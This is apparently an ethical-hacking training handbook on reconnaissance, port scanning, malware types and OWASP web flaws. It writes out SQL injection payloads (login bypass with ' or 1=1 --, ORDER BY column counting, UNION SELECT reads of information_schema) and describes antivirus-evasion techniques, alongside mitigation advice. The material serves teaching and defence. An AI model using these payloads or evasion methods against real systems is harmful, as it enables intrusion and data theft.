TechDefence Workshop Final


  • 1

    Course Material

    Ethical Hacking & Information Security

    By

    Sunny Vaghela www.sunnyvaghela.com

    Head Office: A 805 Wallstreet 2,Opp Orient Club,Near Gujarat College,Ahmedabad 380007

    Office: +91 79 40047405 , Mobile: +91 9898493002

    Website: www.techdefence.com Email: [email protected]

    India Branch Offices: Vallabh Vidyanagar,Rajkot,Himmatnagar,Nashik,Hyderabad

    International Offices: Australia, Mauritius

  • 2

    INDEX

    Sr No.  Title                                        Page No.

    1       Ethical Hacking
    1.1     Cyber Ethics                                 4
    1.2     Information Gathering                        7
    1.3     Scanning                                     17
    1.4     Virus, Worms & Trojans                       22

    2       Web Application Security
    2.1     Why Web Application Security?                27
    2.2     Security Misconceptions                      29
    2.3     Reasons for Attacking Web Applications       30
    2.4     OWASP Top 10 Vulnerabilities                 31
    2.5     Security guidelines                          44

    3       Wireless Hacking & Security
    3.1     Wireless Standards                           47
    3.2     WEP & WPA Summary                            55
    3.3     Cracking WEP & WPA & Countermeasures         56

  • 3

    CHAPTER 1

    Ethical Hacking

    1.1 Cyber Ethics

    1.2 Information Gathering

    1.3 Scanning

    1.4 Virus, Worms, Trojans and Virus analysis

  • 4

    1.1 CYBER ETHICS

    Cyber ethics is a code of behaviour for using the Internet. Since we are going to view it from the hacker's perspective, we will first dissect what the word "hacker" stands for.

    Hacker:

    A person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular. It is used to refer to someone skilled in the use of computer systems, especially if that skill was obtained in an exploratory way. The term is often misused in a pejorative context, where "cracker" would be the correct term, and because of that it has come to be applied to individuals, with or without skill, who break into security systems. Several subgroups of the computer underground, with different attitudes and aims, use different terms to demarcate themselves from each other, or try to exclude some specific group with which they do not agree. In hacker culture there are many different categories, such as white hat (ethical hacking), grey hat, black hat and script kiddies. Usually the term cracker refers to black hat hackers, or more generally hackers with unlawful intentions.

    1. White Hat

    A white hat is the hero or good guy, especially in computing slang, where it refers to an

    ethical hacker or Penetration tester who focuses on securing and protecting IT systems.

    White Hat Hackers, also known as Ethical Hackers, are Computer Security experts, who are

    specialized in penetration testing, and other testing methodologies, to ensure that a

    company's information systems are secure. Such people are employed by companies where

    these professionals are sometimes called sneakers, tiger teams or red teams.

    2. Grey Hat

    A grey hat, in the hacking community, refers to a skilled hacker who sometimes acts

    legally, sometimes in good will, and sometimes not. They are a hybrid between white and

    black hat hackers. They usually do not hack for personal gain or have malicious intentions,

    but may or may not occasionally commit crimes during the course of their technological

  • 5

    exploits.

    3. Black Hat

    A black hat is the villain or bad guy. It refers to a hacker who breaks into networks or computers, or creates computer viruses. Black hat hackers (also called "crackers") specialise in unauthorised penetration of information systems. They may use computers to attack systems for profit, for fun, for political motivations or as part of a social cause. Such penetration often involves modification and/or destruction of data, and is done without authorisation, hence they should not be confused with ethical hackers.

    4. Phreaker

    Phreaking is a slang term coined to describe the activity of a subculture of people who

    study, experiment with, or explore telecommunication systems, like equipment and systems

    connected to public telephone networks. As telephone networks have become

    computerized, Phreaking has become closely linked with computer hacking. This is

    sometimes called the H/P culture (with H standing for Hacking and P standing for

    Phreaking). The term "phreak" is a mixture of the words "phone" and "freak", and may also

    refer to the use of various audio frequencies to manipulate a phone system. "Phreak",

    "phreaker", or "phone phreak" are names used for and by individuals who participate in

    phreaking.

    5. Script Kiddies

    In hacker culture, a script kiddie, occasionally script bunny, skiddie, script kitty, script-

    running juvenile (SRJ), or similar, is a derogatory term used to describe those who use

    scripts or programs developed by others to attack computer systems and networks.

    It is generally assumed that script kiddies are like amateur kids who lack the ability to write

    sophisticated hacking programs or exploits on their own, and that their objective is to try to

    impress their friends or gain credit in underground hacker communities.

    6.Hacktivists

    Some people describing themselves as hacktivists have taken to defacing websites for

    political reasons, such as attacking and defacing government websites as well as web sites

    of groups who oppose their ideology. Hacktivist is a mixture of the words Hacker and

    Activist. Their activities include many political ideals and issues. Hacktivism is a

  • 6

    controversial term. Some argue it was coined to describe how electronic direct action might

    work toward social change by combining programming skills with critical thinking. Others

    use it as practically synonymous with malicious, destructive acts that undermine the

    security of the Internet as a technical, economic, and political platform.

    Malicious Hacker Strategies:

    Just as software is developed in defined steps, attackers follow a fairly predictable sequence of phases when breaking into a system:

    Reconnaissance: basic information gathering about the target system.

    Scanning: scanning the target system for open ports, the services running on those ports, and known weaknesses in them.

    Gaining Access: obtaining actual access to the target system by exploiting a vulnerability found in the previous phases.

    Maintaining Access: keeping access to the system (for example with a backdoor or an added account) so that the attacker does not have to repeat all the steps from scratch.

    Clearing Tracks: removing footprints such as log entries and uploaded tools so as to remain undetected by the victim.

  • 7

    1.2 Information Gathering

    Information gathering is the initial step in both hacking and investigation. It is the process of profiling an organisation, system, server or individual using a methodical procedure.

    Information gathering is used by attackers as well as investigators to learn more about the target.

    Attacker's point of view:

    An attacker will first gather initial information such as domain names, IP addresses, the network IP range, operating systems, services, control-panel information and vulnerable services before attacking the system.

    Footprinting is required to ensure that isolated information repositories that are critical to the attack are not overlooked or left undiscovered. Footprinting comprises only one aspect of the entire information gathering process, but is considered one of the most important stages of a mature attack.

    A common rule of thumb is that an attacker spends about 90% of the time on information gathering and only 10% on actually attacking and gaining access to the system.

    Investigator's point of view:

    An investigator will gather initial information such as the traces the criminal left on the Internet, his or her name, occupation, address, contact number and company or organisation, before taking any legal action.

    This helps the investigator to profile the criminal and his or her activities properly during interrogation.

    Following are the various methodologies for information gathering.

    1. Information Gathering using Search engine:

  • 8

    One leaves footprints and information everywhere while surfing the Internet. This is a basic principle for investigators as well as hackers; the only difference is the way they use this information.

    An attacker will gather information about the system, its operating system and the vulnerable applications running on it, and later exploit them.

    An investigator will gather information on how the attacker gained access to the system and where he or she left footprints on it, and later trace them.

    Search engines are the most powerful tools for finding information about any individual, organisation or system. Following is a list of widely used search engines (as of the time this material was written):

    Google Search (the world's most powerful search engine): www.google.com

    Yahoo Search: www.search.yahoo.com

    MSN Live Search: www.live.com

    AOL Search: www.search.aol.in

    Ask Search: www.ask.com

    Altavista Search: www.altavista.com

    Fast Search: www.alltheweb.com

    Gigablast: www.gigablast.com

    Snap Search: www.snap.com

    2. Information gathering using relational search engines.

    These search engines pull results from several other search engines and draw relations or connections between those results.

    Kartoo

  • 9

    Maltego

    Maltego is an open source intelligence (OSINT) and forensics application. It allows for the mining and gathering of information as well as the representation of this information in a meaningful way. Coupled with its graphing libraries, Maltego allows you to identify key relationships between pieces of information and to uncover previously unknown relationships between them. It is a must-have tool in the forensics, security and intelligence fields. Information is leverage.

    People Search: investigators can find personal information using people-search services.

  • 10

    People search will give phone numbers and addresses as well as background information about organisations.

    Yahoo People Search - www.people.yahoo.com

    Intelius:

    Whois Lookup:

    WHOIS (pronounced "who is"; not an acronym) is a query/response protocol which is

    widely used for querying an official database in order to determine the owner of a domain

    name, an IP address, or an autonomous system number on the Internet. WHOIS lookups

    were traditionally made using a command line interface, but a number of simplified web-

  • 11

    based tools now exist for looking up domain ownership details from different databases.

    Web-based WHOIS clients still rely on the WHOIS protocol to connect to a WHOIS server

    and do lookups, and command-line WHOIS clients are still quite widely used by system

    administrators. WHOIS normally runs on TCP port 43.

    Presently ICANN is undertaking a study to determine the uses and abuses of WHOIS

    information. Other studies that are ongoing concern the accuracy of WHOIS information,

    and the effectiveness of the processes for reporting inaccurate public WHOIS

    information.

    Querying Regional Internet Registries:

    WHOIS servers belonging to Regional Internet Registries (RIR) can be queried to

    determine the Internet Service Provider responsible for a particular IP address. These

    servers are:

    ARIN - http://whois.arin.net

    RIPE NCC - http://www.ripe.net/whois/

    APNIC - http://whois.apnic.net

    LACNIC - http://whois.lacnic.net

    AfriNIC - http://whois.afrinic.net

    The records of each of these registries are cross-referenced, so that a query to ARIN for a

    record which belongs to RIPE will return a placeholder pointing to the RIPE WHOIS

    server. This lets the WHOIS user making the query know that the detailed information

    resides on the RIPE server. Apart from the RIRs mentioned above, there is also a

    commercial global service: Routing Assets Database used by some large networks (eg.

    large internet providers that acquired other ISPs in several RIR areas).
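    As an added example (written for this edit, not part of the original course material): a minimal WHOIS client for the protocol described above (TCP port 43, query plus CRLF, read until the server closes), a parser for the "Key: value" records that registries and registrars return, and a helper that follows the referral placeholder an RIR sends when the record lives at another RIR. The two sample replies below are constructed for the example and are not real registry data; the network functions are included for completeness but the parser runs offline.

```python
import socket

def whois_query(server, query, port=43, timeout=10):
    """Raw WHOIS exchange: TCP connect to port 43, send the query plus CRLF,
    read until the server closes the connection. Needs network access."""
    with socket.create_connection((server, port), timeout=timeout) as sock:
        sock.sendall(query.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")

def parse_whois(text):
    """Collect 'Key: value' lines into a dict of lists (keys repeat, e.g. Name Server).
    Lines starting with % or # are registry comments and are skipped."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "%#" or ":" not in line:
            continue
        key, value = line.split(":", 1)
        fields.setdefault(key.strip(), []).append(value.strip())
    return fields

def referral_server(fields):
    """Host named by an ARIN-style 'ReferralServer: whois://host' line or an
    IANA-style 'refer: host' line, or None when the record is authoritative."""
    for key in ("ReferralServer", "refer"):
        for value in fields.get(key, []):
            host = value.split("://", 1)[-1].strip("/")
            return host.split(":", 1)[0]   # drop an explicit port if present
    return None

def lookup(query, server="whois.iana.org", max_hops=4):
    """Follow referrals from IANA down to the authoritative registry.
    Needs network access; not exercised by the offline samples below."""
    fields = {}
    for _ in range(max_hops):
        fields = parse_whois(whois_query(server, query))
        nxt = referral_server(fields)
        if nxt is None or nxt == server:
            break
        server = nxt
    return server, fields

# Constructed sample replies (not real registry data) to exercise the parser offline.
DOMAIN_SAMPLE = """\
% Constructed sample of a registrar reply
Domain Name: EXAMPLE.COM
Registrar: Example Registrar, Inc.
Creation Date: 2001-02-03T00:00:00Z
Registry Expiry Date: 2031-02-03T00:00:00Z
Name Server: NS1.EXAMPLE.NET
Name Server: NS2.EXAMPLE.NET
Domain Status: clientTransferProhibited
Registrant Organization: Example Org
Registrant Email: registrant@example.com
"""

ARIN_PLACEHOLDER_SAMPLE = """\
# Constructed sample of an ARIN placeholder that points to RIPE
NetRange:       198.51.100.0 - 198.51.100.255
NetName:        EXAMPLE-NET
Organization:   RIPE Network Coordination Centre (RIPE)
ReferralServer: whois://whois.ripe.net
"""

if __name__ == "__main__":
    record = parse_whois(DOMAIN_SAMPLE)
    print("name servers:", record["Name Server"])
    print("registrant:", record["Registrant Email"])
    print("referral from ARIN placeholder:",
          referral_server(parse_whois(ARIN_PLACEHOLDER_SAMPLE)))
```

    The parser is deliberately forgiving (registries differ in spacing and in which keys they use), so treat the extracted values as leads to confirm, exactly as the domaintools walkthrough below does by hand.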

    Domain Tools:

    Whois.net

  • 12

    Samspade.org

    .In registry


    Example: www.techdefence.com whois info using www.domaintools.com

    The record (screenshot not reproduced in this transcript) indicates that the website www.techdefence.com has the title TechDefence Consulting. Its Search Engine Optimization score is 62% for 23 terms.

  • 13

    The techdefence.com domain is registered through DIRECT INTERNET SOLUTIONS PVT LTD. The record also gives the creation date, expiry date and last-modified date of the domain.

    The name servers ns1.hosthunger.com and ns2.hosthunger.com give information about the hosting provider.

    The server data shows Apache, which suggests (but does not prove) a Linux or other Unix-like operating system on the techdefence server; Apache also runs on Windows, so the banner alone is only a hint to be confirmed by other fingerprinting.

    The IP address of techdefence.com is 208.43.231.66.

    The server company (hosting provider) is SoftLayer Technologies.

    Domain status is Active.

    Registrant:

    TechDefence Consulting Pvt Ltd

    Sunny Vaghela ([email protected])

    Ahmedabad

    Ahmedabad

    Gujarat,380007

    INDIA

    Tel. +91.7926631931

    The above information tells that domain techdefence.com is registered by Sunny Vaghela

    from Ahmedabad.

  • 14

    Phone Number of Sunny Vaghela is +91 7926631931

    Email Id used to register the same website is [email protected]

    Reverse IP Mapping:

    Reverse IP mapping is the method of finding the other websites hosted on the same server, i.e. sharing one IP address.

    Here, by selecting the Reverse IP link, we get the list of websites hosted on 208.43.231.66 along with techdefence.com.

    Trace Route:

    Traceroute gives useful information about the number of hops (routers and servers) between your computer and the remote computer, and the address and latency of each hop.

    Useful for investigation as well as for planning different attacks.

    Tools: Visualroute, Neotrace.

    NeoTrace gives a Map view, Node view and List view of the nodes between your computer and the remote computer.

    MAP View for www.techdefence.com

    List View for techdefence.com

  • 15

    Node View for techdefence.com

    Information of Server Node(last Node)

    Geowhere:

    Finds websites via popular newsgroups; also finds mailing lists and newsgroups, and extracts information from 20 search engines.

  • 16

    Email Spiders

    Email spiders are automated programs that crawl web pages, capture the email addresses they find and store them in a database. Spammers use email spiders to collect thousands of addresses for spamming purposes.

    Other Tools: www.visualroute.visualware.com

    www.samspade.org

    www.dnsstuff.com

  • 17

    1.3 Scanning

    Long ago, ports were scanned by hand by connecting to each one with telnet. Today people use far more sophisticated programs that scan whole IP ranges, checking large numbers of ports with many techniques.

    Scanning is the process of finding open/closed ports and vulnerabilities in remote systems, servers and networks. Scanning reveals live IP addresses, operating systems and the services running on the remote computer.

    There are three types of scanning:

    1. Port Scanning

    2. Network Scanning

    3. Vulnerability Scanning

    Port Scanning:

    Port scanning is one of the most popular techniques attackers use to discover the services they can break into.

    All machines connected to a LAN or to the Internet via a modem run many services that listen on well-known and not-so-well-known ports.

    There are 65536 port numbers (0 to 65535) per transport protocol on a computer.

    By port scanning the attacker finds which ports are open.

    Ports: Port numbers are unique only within a single host (and per transport protocol). Port numbers are 16-bit unsigned numbers.

    The port numbers are divided into three ranges:

    1. Well Known Ports (0..1023),

    2. The Registered Ports (1024..49151),

  • 18

    3. The Dynamic and/or Private Ports (49152..65535).

    Well Known Ports:

    Service    Port/Proto     Description
    echo       7/tcp          Echo
    ftp-data   20/tcp         File Transfer [Default Data]
    ftp        21/tcp         File Transfer [Control]
    ssh        22/tcp         SSH Remote Login Protocol
    telnet     23/tcp         Telnet
    smtp       25/tcp         Simple Mail Transfer Protocol
    whois      43/tcp         WHOIS server
    domain     53/tcp,udp     Domain Name Server
    www-http   80/tcp         World Wide Web HTTP

    Registered Ports:

    Service    Port/Proto     Description
    wins       1512/tcp       Microsoft Windows Internet Name Service
    radius     1812/udp       RADIUS authentication protocol
    yahoo      5010           Yahoo! Messenger
    x11        6000-6063/tcp  X Window System

    TCP Packet Header

    The flag bits in the TCP header (and two related fields) that matter for scanning:

    SYN     Synchronize: used to initiate a connection between hosts.
    ACK     Acknowledgement: acknowledges received data (and the peer's SYN); set on every segment of an established connection.
    RST     Reset: aborts the connection; a closed port answers a SYN (and a FIN/Null/Xmas probe) with RST.
    PSH     Push: tells the receiving system to hand all buffered data to the application.
    URG     Urgent: states that the data contained in the packet should be processed immediately.
    FIN     Finish: tells the remote system that there will be no more transmission.
    WINDOW  Receive window size advertised by the sender.
    TTL     Time to Live. (Strictly an IP-header field, not a TCP field, but scanners read it for OS fingerprinting.)

    Open Scan

    Known as TCP connect scan and normally done with ordinary sockets (connect()), this technique is the oldest and works by making a full connection with the server.

  • 19

    For that it completes the three-packet exchange known as the three-way handshake:

    For open ports:

    Client ----> SYN -------> Server
    Client <---- SYN+ACK <--- Server
    Client ----> ACK -------> Server

    For closed ports:

    Client ----> SYN -------> Server
    Client <---- RST <------- Server

  • 20

    SYN (Half-open) Scan:

    A SYN packet is sent to the remote computer. If the target host responds with SYN+ACK, the port is listening; an RST indicates a non-listener. The scanner then sends RST instead of the final ACK, so the handshake is never completed and the application behind the port never sees a connection, which is why this is also called a stealth or half-open scan.

    FIN Scan:

    Another technique sends unexpected packets to a port, expecting that open listening ports will react differently from closed ports. A FIN scan sends a bare FIN segment with no preceding connection:

    Closed ports reply to FIN packets with RST.

    Open ports ignore the packets (no reply).

    XMAS Scan:

    An Xmas scan sends packets with the FIN, PSH and URG flags set (the packet is "lit up like a Christmas tree"; some older tools set every flag).

    Closed ports reply to packets with RST.

    Open ports ignore the packets.

    NULL Scan:

    A Null scan sends packets with no TCP flags set to the target host.

    Closed ports reply to packets with RST.

    Open ports ignore the packets.

    Caveat for all three: the open/closed distinction above holds only for TCP stacks that follow RFC 793. Microsoft Windows, Cisco devices and several other systems answer RST to such probes whether the port is open or not, so against them every port appears closed. Also, "no reply" is indistinguishable from a firewall silently dropping the probe, which is why Nmap reports such ports as open|filtered rather than open.
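    An added example (written for this edit, not from the course material or from Nmap): the TCP flag bits from the header table above, a builder and parser for a raw 20-byte TCP header, and the open/closed/filtered decision rule for connect, SYN, FIN, Xmas and Null scans. Two simulated target stacks stand in for real hosts so that it runs offline: one that follows RFC 793 and one that, like Windows, answers RST to every stray probe. Sending raw segments on a real network needs a raw socket and root privileges and is not done here.

```python
import struct

# TCP flag bits in byte 13 of the header; the names match the page's table.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
FLAG_NAMES = {FIN: "FIN", SYN: "SYN", RST: "RST", PSH: "PSH", ACK: "ACK", URG: "URG"}

# Flags each scan type puts in its probe (Nmap's choice for Xmas: FIN+PSH+URG).
PROBES = {"connect": SYN, "syn": SYN, "fin": FIN, "xmas": FIN | PSH | URG, "null": 0}

def build_tcp_header(src_port, dst_port, flags, seq=0, ack=0, window=65535):
    """Pack a 20-byte TCP header with no options. The checksum is left as zero;
    a real scanner computes it over the IP pseudo-header before sending."""
    data_offset = 5 << 4            # header length in 32-bit words, reserved bits 0
    return struct.pack("!HHIIBBHHH", src_port, dst_port, seq, ack,
                       data_offset, flags, window, 0, 0)

def parse_tcp_flags(header):
    """Names of the flags set in a raw TCP header (the first 20 bytes)."""
    flags = struct.unpack("!HHIIBBHHH", header[:20])[5]
    return {name for bit, name in FLAG_NAMES.items() if flags & bit}

def classify(scan_type, response_flags):
    """Decide a port's state from the flags of the reply to one probe.
    response_flags is None when nothing came back before the timeout."""
    if scan_type in ("connect", "syn"):
        if response_flags is None:
            return "filtered"
        if response_flags & SYN and response_flags & ACK:
            return "open"
        if response_flags & RST:
            return "closed"
        return "filtered"
    # FIN / Xmas / Null: RFC 793 stacks answer RST only for closed ports and drop
    # the probe for open ones, so silence also matches a firewall dropping it.
    if response_flags is None:
        return "open|filtered"
    if response_flags & RST:
        return "closed"
    return "filtered"

def rfc793_target(open_ports):
    """Simulated host whose TCP stack follows RFC 793 (constructed, not a real host)."""
    def respond(port, probe_flags):
        if probe_flags & SYN:
            return SYN | ACK if port in open_ports else RST
        return None if port in open_ports else RST
    return respond

def windows_like_target(open_ports):
    """Simulated host that, like Windows, answers RST to any probe that is not a SYN."""
    def respond(port, probe_flags):
        if probe_flags & SYN:
            return SYN | ACK if port in open_ports else RST
        return RST
    return respond

def scan(target, scan_type, ports):
    """Run one scan type against a (simulated) target; returns {port: state}."""
    probe = PROBES[scan_type]
    return {port: classify(scan_type, target(port, probe)) for port in ports}

if __name__ == "__main__":
    unix_box = rfc793_target({22, 80})
    win_box = windows_like_target({22, 80})
    for kind in ("syn", "fin", "xmas", "null"):
        print(kind, "vs RFC 793:", scan(unix_box, kind, [22, 23, 80]),
              "| vs Windows-like:", scan(win_box, kind, [22, 23, 80]))
    print("Xmas probe flags:", parse_tcp_flags(build_tcp_header(40000, 80, PROBES["xmas"])))
```

    The point of the two simulated targets is the caveat in the text: a FIN, Xmas or Null scan against the Windows-like stack reports every port closed, including the ones that are open, while the SYN scan gets the right answer on both.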

    Port Scanner: NMAP

    Nmap is a powerful utility for scanning large numbers of hosts and ports.

  • 21

    It is provided with a GUI (Zenmap) as well as a command line interface.

    It is supported on many operating systems.

    It can carry out SYN scan (also called the stealth or half-open scan, -sS), connect scan (-sT), FIN scan (-sF), Xmas scan (-sX), Null scan (-sN) and many other types.

    Network Scanners: Global Network Inventory Software:

  • 22

    1.4 Virus, Worms, Trojans and Virus analysis

    Spyware

    Spyware is a piece of software that gets installed on a computer without your consent. It collects your personal information without you being aware of it. It may also change how your computer or web browser is configured and bombard you with online advertisements. Spyware programs are notorious for being difficult to remove on your own and for slowing down your PC. The program gets installed in the background while you are doing something else on the Internet. Spyware became widespread partly because cable modem and DSL connections are always connected.

    Difference between Virus, Worms and Trojans

    A virus is a program that self-replicates by injecting its code into other files, normally executables. It needs a host file and spreads when that infected host is run or copied to another machine.

    A worm copies itself over a network. It is a program that treats other computers on the network, rather than other executable files on the already infected computer, as its infection points, and usually needs no user action to spread.

    A Trojan is a program that, once executed, performs a task other than the one the user expected.

    Modes of Transmission

    IRC

    ICQ

    Email Attachments

    Physical Access

    Browser & email Software Bugs

    Advertisements

    NetBIOS

    Fake Programs

  • 23

    Virus Properties

    Your computer can be infected even if files are just copied.

    Can be polymorphic.

    Can be memory or non-memory resident.

    Can be a stealth virus.

    Viruses can carry other viruses.

    Can make the system never show outward signs.

    Can survive formatting of the system partition, e.g. by living in the boot sector, another partition or firmware that the format did not touch.

    Virus Operation Phase

    Most viruses operate in two phases.

    1. Infection Phase. In this phase the virus (as decided by its developer)

    - chooses when to infect programs

    - chooses which programs to infect

    Some viruses infect the computer as soon as the virus file is installed on it.

    Some viruses infect the computer at a specific date, time or particular event.

    TSR viruses are loaded into memory and infect the PC later.

    2. Attack Phase. In this phase the virus will

    - delete files,

    - replicate itself to other PCs,

    - or corrupt its targets only.

    Virus Indications

    Following are some of the common indications that a virus has infected a system.

    Files have stranger names than normal.

    File extensions may also be changed.

    Programs take longer to load than normal.

    The computer's hard drive constantly runs out of free space.

  • 24

    The victim is not able to open some programs.

    Programs get corrupted without any reason.

    Virus Types

    Following are some of the common types of virus.

    Macro Virus: spreads through and infects documents that carry macros (e.g. Word and Excel files).

    File Virus: infects executables.

    Source Code Virus: affects and damages source code.

    Network Virus: spreads via network elements and protocols.

    Boot Virus: infects boot sectors and boot records.

    Shell Virus: virus code forms a shell around the target host's genuine program and runs it as a subroutine.

    Terminate & Stay Resident (TSR) Virus: remains permanently in memory during the work session even after the target host is executed and terminated.

    Methods to Avoid Detection

    1. Same last Modified Date.

    In order to avoid detection by users, some viruses employ different kinds of

    deception.

    Some old viruses, especially on the MS-DOS platform, make sure that the "last modified" date of a host file stays the same when the file is infected by the virus. This approach sometimes fools anti-virus software.

    2. Overwriting Unused areas of the .exe files.

    3. Killing tasks of Antivirus Softwares.

    Some viruses try to avoid detection by killing the tasks associated with antivirus

    software before it can detect them.

    4. Avoiding Bait files & other undesirable hosts.

  • 25

    Bait files (or goat files) are files that are specially created by anti-virus software, or by

    anti-virus professionals themselves, to be infected by a virus.

    Many anti-virus programs perform an integrity check of their own code.

    Infecting such programs will therefore increase the likelihood that the virus is

    detected.

    Anti-virus professionals can use bait files to take a sample of a virus

    5. Making stealth virus.

    Some viruses try to trick anti-virus software by intercepting its requests to the

    operating system.

    The virus can then return an uninfected version of the file to the anti-virus

    software, so that it seems that the file is "clean".

    6. Self Modification on each Infection.

    Some viruses try to trick anti-virus software by modifying themselves on each infection.

    As the file signature changes with each copy, antivirus software finds it difficult to detect.

    7. Encryption with variable key.

    Some viruses use simple methods to encipher their code.

    The virus body is encrypted with a different key on each infection.

    The AV cannot match such files against a static signature of the body; it must instead detect the small decryptor routine, which stays constant, or emulate the code until it decrypts itself.

    Virus Analysis

    1. IDA Pro

    It is a disassembler and debugger.

    Runs on both Linux and Windows.

    Can be used for analysis of compiled code (no source required), vulnerability research and reverse engineering.

  • 26

    Autoruns: Sysinternals tool that lists every program, driver and service configured to start at boot or logon, which is where malware usually installs its persistence.

    Process Explorer: Sysinternals tool that shows running processes, their parent/child tree, loaded DLLs and open handles, for spotting suspicious processes.

  • 27

    CHAPTER 2

    Web Application

    Hacking & Security

    2.1 Why Web Application Security?

    2.2 Security Misconceptions

    2.3 Reasons for Attacking Web Applications

    2.4 OWASP Top 10 Vulnerabilities

    2.5 Security guidelines

    2.6 Web Application Security checklist

  • 28

    2.1 Why Web Application Security?

    Problem Illustration

    Application Layer

    Attacker sends attacks inside valid HTTP requests.

    Your custom code is tricked into doing something it should not.

    Security requires software development expertise, not signatures.

    Network Layer

    Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks

    inside HTTP requests.

    Security relies on signature databases

  • 29

    2.2 Security Misconceptions

    The Firewall protects my web server and database

    Access to the server through ports 80 and 443 makes the web server part of your

    external perimeter defense.

    Vulnerabilities in the web server software or web applications may allow

    access to internal network resources

    The IDS protects my web server and database

    The IDS is configured to detect signatures of various well-known attacks.

    Attack signatures do not include those for attacks against custom applications.

    SSL secures my site

    SSL secures the transport of data between the web server and the user's browser.

    SSL does not protect against attacks on the server and applications.

    SSL is the hacker's best friend due to the false sense of security it creates.

    The Source of the Problem

    "Malicious hackers don't create security holes; they simply exploit them. Security holes and vulnerabilities, the real root cause of the problem, are the result of bad software design and implementation."

    - John Viega & Gary McGraw

  • 30

    2.3 Reasons For Attacking Web Applications

    Vulnerability Used (chart not reproduced in this transcript)

  • 31

    2.4 OWASP TOP 10 VULNERABILITIES

    1. INJECTION FLAWS

    Injection means

    Tricking an application into including unintended commands in the data

    sent to an interpreter

    Interpreters

    Take strings and interpret them as commands.

    SQL, OS Shell, LDAP, XPath, etc

    SQL injection is still quite common.

    Many applications still susceptible.

    INJECTION FLAWS

    1. Application presents a form to the attacker all via SSL.

    2. Attacker sends an attack in the form data

    3. Application forwards attack to the database in a SQL query

    4. Database runs query containing attack and sends encrypted results back to application

    5. Application decrypts data as normal and sends results to the user

  • 32

    SQL INJECTION

    It is a flaw in "web application" development, it is not a DB or web server problem.

    Most programmers are still not aware of this problem.

    A lot of the tutorials & demo templates are vulnerable

    Even worse, a lot of solutions posted on the Internet are not good enough.

    In our pen tests over 60% of our clients turn out to be vulnerable to SQL

    Injection

    BUSINESS IMPACT OF SQL INJECTION

    Attackers can

    Access the entire database schema

    Steal, modify, and delete database contents

    Prevent legitimate access to the database

    Run operating system commands on database server

    Disclose company proprietary data

    Common vulnerable login query

    SELECT * FROM users WHERE login = 'victor' AND password = '123'

    (If it returns something, then login!)

    ASP/MS SQL Server login syntax

    var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'";

    Injecting Through Strings

    formusr = ' or 1=1 --

    formpwd = anything

  • 33

    The final query would look like this:

    SELECT * FROM users WHERE login = '' or 1=1 --' AND password = 'anything'

    The -- starts a comment, so the rest of the line (including the password check) is ignored and the WHERE clause is simply true. Without the comment the attacker has to remember that AND binds tighter than OR: login = '' or 1=1 AND password = 'anything' only matches rows whose password is literally 'anything', so the payload ' or '1'='1 would have to go into both fields instead.

    THE POWER OF '

    The single quote closes the string parameter.

    Everything after it is considered part of the SQL command.

    SELECT * FROM clients

    WHERE account = 12345678

    AND pin = 1111

    PHP/MySQL login syntax

    $sql = "SELECT * FROM clients WHERE " .

    "account = $formacct AND " .

    "pin = $formpin";

    Injecting Numeric Fields

    $formacct = 1 or 1=1 #

    $formpin = 1111

    Final query would look like this:

    SELECT * FROM clients

    WHERE account = 1 or 1=1

    # AND pin = 1111

    Standard SQL commands such as "SELECT", "INSERT", "UPDATE", "DELETE", "CREATE" and "DROP" can be used to accomplish almost everything that one needs to do with a database.

    When you click a link like this,

  • 34

    www.site.com/news.asp?ArticleID=10

    the link tells the site to look in the table that stores the article names for the article whose "ArticleID" is 10.

    INFORMATION_SCHEMA holds the names of every table and column in the database. On MySQL (5.0 and later), Microsoft SQL Server and PostgreSQL there is always an INFORMATION_SCHEMA and its name never changes, which is what makes the extraction queries below portable. (Oracle exposes the same information through its data-dictionary views such as ALL_TABLES instead.)

    Understanding Error Messages

    Example: www.site.com/index.php?id=1

    Add ' or /* after id=1 to check whether the site is vulnerable or not.

    If the site returns a database error, it is very likely vulnerable to SQL injection.

    If a blank page is shown, the parameter may still be injectable but without visible errors, i.e. vulnerable to blind injection.

    Finding out Vulnerable Columns

    Example: www.site.com/index.php?id=1+order+by+1 --

    Increase the ORDER BY number until you get an error message something like

    Unknown column '5' in 'order clause'

    The last number that works is the number of columns in the original query, which the UNION below must match.

    Extracting Information from the database

    www.site.com/index.php?id=1+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables

    The above query gives the names of the tables stored in the database.

    www.site.com/index.php?id=1+union+all+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where+table_schema=char()

    The above query gives the names of the columns of all tables in the schema whose name is spelled out with char().

    SQL Injection Mitigation

    Strong Design

  • 35

    Define an easy "secure" path to querying data

    Use stored procedures for interacting with database

    Call stored procedures through a parameterized API

    Validate all input through generic routines

    Use the principle of "least privilege"

    Input Validation

    Define data types for each field.

    Implement stringent "allow only good" filters.

    If the input is supposed to be numeric, use a numeric variable in your script to store it.

    Reject bad input rather than attempting to escape or modify it.

    "Known bad" filters (rejecting "select", "insert", "update", "shutdown", "delete", "drop", "--", "'") can be added as a secondary layer, but they are easily bypassed with case changes, encodings and comment tricks, and they break legitimate input such as the surname O'Brien. Parameterized queries, and stored procedures called through a parameterized API, remain the primary defence.

    Harden the Server

    Run DB as a low-privilege user account

    Remove unused stored procedures and functionality or restrict access to

    administrators

    Change permissions and remove "public" access to system objects

    Audit password strength for all user accounts
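    An added example, written for this edit and not part of the course material, that reproduces the injection walkthrough above and the parameterized fix from the mitigation list against an in-memory SQLite database: the concatenated login query with the ' or 1=1 -- and ' or '1'='1 style payloads (and the AND-before-OR precedence trap), the unquoted numeric query, ORDER BY column counting, and a UNION read of the table list, with SQLite's sqlite_master standing in for INFORMATION_SCHEMA.tables. The users table and its two rows are constructed for the example; -- replaces the MySQL-only # comment.

```python
import sqlite3

def make_db():
    """Constructed sample data for the example: an in-memory SQLite database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, login TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "victor", "123"), (2, "alice", "s3cret")])
    return con

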